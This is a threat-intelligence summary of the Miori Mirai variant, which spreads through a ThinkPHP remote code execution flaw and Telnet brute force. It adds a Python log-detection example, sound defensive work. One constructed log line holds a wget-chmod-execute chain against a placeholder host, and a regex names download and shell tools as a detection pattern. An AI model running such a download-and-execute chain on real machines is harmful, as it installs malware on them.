With Mirai Comes Miori: IoT Botnet Delivered via ThinkPHP Remote Code Execution
(Dec 20, 2018)
Trend Micro researchers have published their analysis of a variant of the "Mirai" Internet-of-Things (IoT) malware called "Miori." Multiple Mirai variants have appeared since the malware's source code was leaked in 2016. The Miori malware was found to be propagating itself via "a Remote Code Execution (RCE) vulnerability in the PHP framework, ThinkPHP." The same vulnerability has been observed being used by other Mirai variants (APEP, IZ1H9), details of which were first mentioned on December 11, 2018. The vulnerability affects ThinkPHP versions before "5.0.23 and 5.1.31." Additionally, researchers found that the actors behind Miori "used the ThinkPHP RCE to make vulnerable machines download and execute their malware," which subsequently uses the Telnet protocol to brute force other IPs.
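The two observable stages described above (a web request that makes the host download and execute a binary, then a burst of Telnet login failures from the infected host) both leave traces in ordinary logs. The following is an added detection example, not code from the Trend Micro report or from Anomali; the log lines, IP addresses and the `q` request parameter are constructed placeholders and do not reproduce the real ThinkPHP request format.

```python
import re
from collections import Counter
from typing import Dict, List
from urllib.parse import unquote

# Constructed web-server access log (sample data, not from the report). One
# request carries a URL-encoded download-and-execute chain of the kind the
# report describes; the parameter name "q" is a placeholder, not the real
# ThinkPHP request format.
ACCESS_LOG = """\
198.51.100.7 - - [20/Dec/2018:10:01:02 +0000] "GET /index.php?page=home HTTP/1.1" 200 512
203.0.113.9 - - [20/Dec/2018:10:01:05 +0000] "GET /page?q=wget%20http://203.0.113.9/bin.sh%20-O%20/tmp/x;chmod%20777%20/tmp/x;/tmp/x HTTP/1.1" 200 77
198.51.100.8 - - [20/Dec/2018:10:01:09 +0000] "GET /search?q=curl+bash+tutorial HTTP/1.1" 200 900
"""

# Constructed syslog lines from an IoT device's telnet daemon (sample data).
AUTH_LOG = """\
Dec 20 10:02:01 cam01 telnetd[211]: login failed for root from 203.0.113.9
Dec 20 10:02:02 cam01 telnetd[211]: login failed for admin from 203.0.113.9
Dec 20 10:02:02 cam01 telnetd[211]: login failed for root from 203.0.113.9
Dec 20 10:02:03 cam01 telnetd[211]: login failed for support from 203.0.113.9
Dec 20 10:02:40 cam01 telnetd[212]: login failed for admin from 198.51.100.20
"""

ACCESS_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+)')
# A fetch tool followed later in the same request by a permission change or a
# shell invocation is the download-and-execute shape the report describes.
DOWNLOAD_EXEC_RE = re.compile(r"\b(wget|curl|tftp)\b.*?\b(chmod|sh)\b", re.I)
TELNET_FAIL_RE = re.compile(r"telnetd\[\d+\]: login failed for \S+ from (\S+)")


def find_download_exec(log: str) -> List[str]:
    """Source IPs of requests whose decoded URL carries a download-and-execute chain."""
    hits = []
    for line in log.splitlines():
        m = ACCESS_RE.match(line)
        if m and DOWNLOAD_EXEC_RE.search(unquote(m.group(2))):
            hits.append(m.group(1))
    return hits


def telnet_bruteforce_sources(log: str, threshold: int = 3) -> Dict[str, int]:
    """Source IPs with at least `threshold` failed telnet logins in the log."""
    failures = Counter(m.group(1) for m in map(TELNET_FAIL_RE.search, log.splitlines()) if m)
    return {ip: n for ip, n in failures.items() if n >= threshold}


if __name__ == "__main__":
    print("download-and-execute requests from:", find_download_exec(ACCESS_LOG))
    print("telnet brute force from:", telnet_bruteforce_sources(AUTH_LOG))
```

Hosts flagged by the first check that then appear as sources in the second are the ones to prioritise, since that ordering matches the infection-then-propagation chain the report describes.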
Recommendation: Denial-of-service attacks can cost your company revenue because severe attacks can shut down online services for extended periods of time. Since the leak of the Mirai botnet source code in October 2016, the ability of threat actors to compromise vulnerable devices and to purchase DDoS-for-hire services has been a continually evolving threat. Mitigation techniques vary depending on the specifics of the attack. For example, in the case of BlackNurse, which can disrupt enterprise firewalls, ICMP type 3 traffic should be blocked, or at least rate limited.
Indicators of Compromise (IOCs) associated with this story can be viewed by ThreatStream users here to identify potential malicious activity.